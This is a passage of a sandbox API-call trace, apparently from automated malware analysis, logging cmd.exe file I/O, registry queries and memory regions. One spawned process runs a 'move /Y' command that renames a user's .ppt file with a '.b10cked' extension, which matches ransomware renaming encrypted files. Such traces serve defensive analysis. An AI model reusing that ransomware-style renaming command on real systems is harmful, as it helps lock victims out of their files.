_get_osfhandle (_FileHandle=1) returned 0x4c [0235.714] GetFileType (hFile=0x4c) returned 0x1 [0235.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.714] WriteFile (in: hFile=0x4c, lpBuffer=0x14f188*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f188*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.714] GetFileType (hFile=0x4c) returned 0x1 [0235.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.714] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1d8*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f1d8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.714] GetFileType (hFile=0x4c) returned 0x1 [0235.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.714] WriteFile (in: hFile=0x4c, lpBuffer=0x14f228*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f228*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.714] GetFileType (hFile=0x4c) returned 0x1 [0235.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.714] WriteFile (in: hFile=0x4c, lpBuffer=0x14f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f278*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.714] GetFileType (hFile=0x4c) returned 0x1 [0235.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.714] WriteFile (in: hFile=0x4c, lpBuffer=0x14f2c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f2c8*, lpNumberOfBytesWritten=0x14e2cc*=0x20, lpOverlapped=0x0) returned 1 [0235.714] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.714] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e2b8 | out: lpNewFilePointer=0x0) returned 1 [0235.714] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.714] ReadFile (in: hFile=0x54, lpBuffer=0x14f0e8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2d8, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesRead=0x14e2d8*=0x200, lpOverlapped=0x0) returned 1 [0235.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.715] GetFileType (hFile=0x4c) returned 0x1 [0235.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.715] GetFileType 
(hFile=0x4c) returned 0x1 [0235.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.715] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.715] GetFileType (hFile=0x4c) returned 0x1 [0235.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.715] WriteFile (in: hFile=0x4c, lpBuffer=0x14f138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f138*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.715] GetFileType (hFile=0x4c) returned 0x1 [0235.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.715] WriteFile (in: hFile=0x4c, lpBuffer=0x14f188*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f188*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.715] GetFileType (hFile=0x4c) returned 0x1 [0235.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.715] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f1d8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.715] GetFileType (hFile=0x4c) returned 0x1 [0235.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.715] WriteFile (in: hFile=0x4c, lpBuffer=0x14f228*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f228*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.715] GetFileType (hFile=0x4c) returned 0x1 [0235.715] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0235.715] WriteFile (in: hFile=0x4c, lpBuffer=0x14f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f278*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.715] GetFileType (hFile=0x4c) returned 0x1 [0235.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.715] WriteFile (in: hFile=0x4c, lpBuffer=0x14f2c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f2c8*, lpNumberOfBytesWritten=0x14e2cc*=0x20, lpOverlapped=0x0) returned 1 [0235.716] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.716] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e2b8 | out: lpNewFilePointer=0x0) returned 1 [0235.716] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.716] ReadFile (in: hFile=0x54, lpBuffer=0x14f0e8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2d8, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesRead=0x14e2d8*=0x32, lpOverlapped=0x0) returned 1 [0235.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.716] GetFileType (hFile=0x4c) returned 0x1 [0235.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.716] GetFileType (hFile=0x4c) returned 0x1 [0235.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.716] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0e8*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesWritten=0x14e2cc*=0x32, lpOverlapped=0x0) returned 1 [0235.716] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.716] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e2b8 | out: lpNewFilePointer=0x0) returned 1 [0235.716] _close (_FileHandle=4) returned 0 [0235.717] FindNextFileW (in: hFindFile=0x190e50, lpFindFileData=0x14f34c | out: 
lpFindFileData=0x14f34c) returned 0 [0235.717] GetLastError () returned 0x12 [0235.717] FindClose (in: hFindFile=0x190e50 | out: hFindFile=0x190e50) returned 1 [0235.717] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0235.718] _close (_FileHandle=3) returned 0 [0235.718] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.718] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.718] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.718] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.718] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.718] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.718] SetConsoleInputExeNameW () returned 0x1 [0235.718] GetConsoleOutputCP () returned 0x1b5 [0235.718] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.718] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.719] exit (_Code=0) Process: id = "641" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16a60" os_pid = "0x9b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\KC6Z~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\kC6z.pptx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35118 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000010000" filename = "" Region: id = 35119 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35120 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35121 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 35122 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35123 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35124 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35125 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35126 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 35127 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35138 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35139 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35140 start_va = 0x50000 end_va 
= 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35141 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 35142 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 35143 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35144 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35145 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35146 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35147 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35148 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35149 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = 
"\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35150 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35151 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35152 start_va = 0x340000 end_va = 0x407fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 35153 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35154 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35155 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 35156 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 35157 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 35158 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 35159 start_va = 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 35160 start_va = 0x520000 end_va = 0x111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 
35161 start_va = 0x1120000 end_va = 0x1282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Thread: id = 881 os_tid = 0xd50 [0234.445] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fcf4 | out: lpSystemTimeAsFileTime=0x22fcf4*(dwLowDateTime=0xbf32b0c0, dwHighDateTime=0x1d440a9)) [0234.445] GetCurrentProcessId () returned 0x9b4 [0234.445] GetCurrentThreadId () returned 0xd50 [0234.446] GetTickCount () returned 0x40646 [0234.446] QueryPerformanceCounter (in: lpPerformanceCount=0x22fcec | out: lpPerformanceCount=0x22fcec*=29123476120) returned 1 [0234.446] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0234.446] __set_app_type (_Type=0x1) [0234.446] __p__fmode () returned 0x76b331f4 [0234.446] __p__commode () returned 0x76b331fc [0234.446] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0234.446] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0234.446] GetCurrentThreadId () returned 0xd50 [0234.446] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd50) returned 0x38 [0234.447] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.447] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0234.447] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.447] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0234.447] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fc84 | out: phkResult=0x22fc84*=0x0) returned 0x2 [0234.447] VirtualQuery (in: lpAddress=0x22fcbb, lpBuffer=0x22fc54, dwLength=0x1c | out: lpBuffer=0x22fc54*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, 
RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.447] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fc54, dwLength=0x1c | out: lpBuffer=0x22fc54*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0234.447] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fc54, dwLength=0x1c | out: lpBuffer=0x22fc54*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0234.447] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fc54, dwLength=0x1c | out: lpBuffer=0x22fc54*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.447] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fc54, dwLength=0x1c | out: lpBuffer=0x22fc54*(BaseAddress=0x230000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x10000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0234.447] GetConsoleOutputCP () returned 0x1b5 [0234.447] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.447] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0234.447] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.447] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0234.447] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.447] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0234.448] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.448] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.448] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.448] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0234.448] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.448] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) 
returned 1 [0234.448] GetEnvironmentStringsW () returned 0x250150* [0234.448] FreeEnvironmentStringsW (penv=0x250150) returned 1 [0234.448] GetEnvironmentStringsW () returned 0x250150* [0234.448] FreeEnvironmentStringsW (penv=0x250150) returned 1 [0234.448] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ebf4 | out: phkResult=0x22ebf4*=0x40) returned 0x0 [0234.448] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ebfc, lpData=0x22ec00, lpcbData=0x22ebf8*=0x1000 | out: lpType=0x22ebfc*=0x0, lpData=0x22ec00*=0x78, lpcbData=0x22ebf8*=0x1000) returned 0x2 [0234.448] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ebfc, lpData=0x22ec00, lpcbData=0x22ebf8*=0x1000 | out: lpType=0x22ebfc*=0x4, lpData=0x22ec00*=0x1, lpcbData=0x22ebf8*=0x4) returned 0x0 [0234.449] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ebfc, lpData=0x22ec00, lpcbData=0x22ebf8*=0x1000 | out: lpType=0x22ebfc*=0x0, lpData=0x22ec00*=0x1, lpcbData=0x22ebf8*=0x1000) returned 0x2 [0234.449] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ebfc, lpData=0x22ec00, lpcbData=0x22ebf8*=0x1000 | out: lpType=0x22ebfc*=0x4, lpData=0x22ec00*=0x0, lpcbData=0x22ebf8*=0x4) returned 0x0 [0234.449] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ebfc, lpData=0x22ec00, lpcbData=0x22ebf8*=0x1000 | out: lpType=0x22ebfc*=0x4, lpData=0x22ec00*=0x40, lpcbData=0x22ebf8*=0x4) returned 0x0 [0234.449] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ebfc, lpData=0x22ec00, lpcbData=0x22ebf8*=0x1000 | out: lpType=0x22ebfc*=0x4, lpData=0x22ec00*=0x40, lpcbData=0x22ebf8*=0x4) returned 0x0 [0234.449] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ebfc, 
lpData=0x22ec00, lpcbData=0x22ebf8*=0x1000 | out: lpType=0x22ebfc*=0x0, lpData=0x22ec00*=0x40, lpcbData=0x22ebf8*=0x1000) returned 0x2 [0234.449] RegCloseKey (hKey=0x40) returned 0x0 [0234.449] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ebf4 | out: phkResult=0x22ebf4*=0x40) returned 0x0 [0234.449] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ebfc, lpData=0x22ec00, lpcbData=0x22ebf8*=0x1000 | out: lpType=0x22ebfc*=0x0, lpData=0x22ec00*=0x40, lpcbData=0x22ebf8*=0x1000) returned 0x2 [0234.449] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ebfc, lpData=0x22ec00, lpcbData=0x22ebf8*=0x1000 | out: lpType=0x22ebfc*=0x4, lpData=0x22ec00*=0x1, lpcbData=0x22ebf8*=0x4) returned 0x0 [0234.449] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ebfc, lpData=0x22ec00, lpcbData=0x22ebf8*=0x1000 | out: lpType=0x22ebfc*=0x0, lpData=0x22ec00*=0x1, lpcbData=0x22ebf8*=0x1000) returned 0x2 [0234.449] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ebfc, lpData=0x22ec00, lpcbData=0x22ebf8*=0x1000 | out: lpType=0x22ebfc*=0x4, lpData=0x22ec00*=0x0, lpcbData=0x22ebf8*=0x4) returned 0x0 [0234.449] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ebfc, lpData=0x22ec00, lpcbData=0x22ebf8*=0x1000 | out: lpType=0x22ebfc*=0x4, lpData=0x22ec00*=0x9, lpcbData=0x22ebf8*=0x4) returned 0x0 [0234.449] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ebfc, lpData=0x22ec00, lpcbData=0x22ebf8*=0x1000 | out: lpType=0x22ebfc*=0x4, lpData=0x22ec00*=0x9, lpcbData=0x22ebf8*=0x4) returned 0x0 [0234.449] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ebfc, lpData=0x22ec00, lpcbData=0x22ebf8*=0x1000 | out: lpType=0x22ebfc*=0x0, 
lpData=0x22ec00*=0x9, lpcbData=0x22ebf8*=0x1000) returned 0x2 [0234.449] RegCloseKey (hKey=0x40) returned 0x0 [0234.449] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0234.449] srand (_Seed=0x5b8863c2) [0234.449] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\KC6Z~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\kC6z.pptx.b10cked\"" [0234.449] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\KC6Z~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\kC6z.pptx.b10cked\"" [0234.449] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.449] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2518b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0234.450] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0234.450] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0234.450] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.450] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0234.450] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0234.450] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0234.450] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0234.450] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0234.450] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0234.450] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0234.450] _wcsicmp (_String1="PROMPT", 
_String2="HIGHESTNUMANODENUMBER") returned 8 [0234.450] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0234.450] GetEnvironmentStringsW () returned 0x2522a0* [0234.450] FreeEnvironmentStringsW (penv=0x2522a0) returned 1 [0234.450] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.450] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.450] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0234.450] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0234.450] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0234.450] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0234.450] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0234.450] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0234.450] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0234.450] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0234.450] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f9c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.450] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f9c0, lpFilePart=0x22f9bc | out: 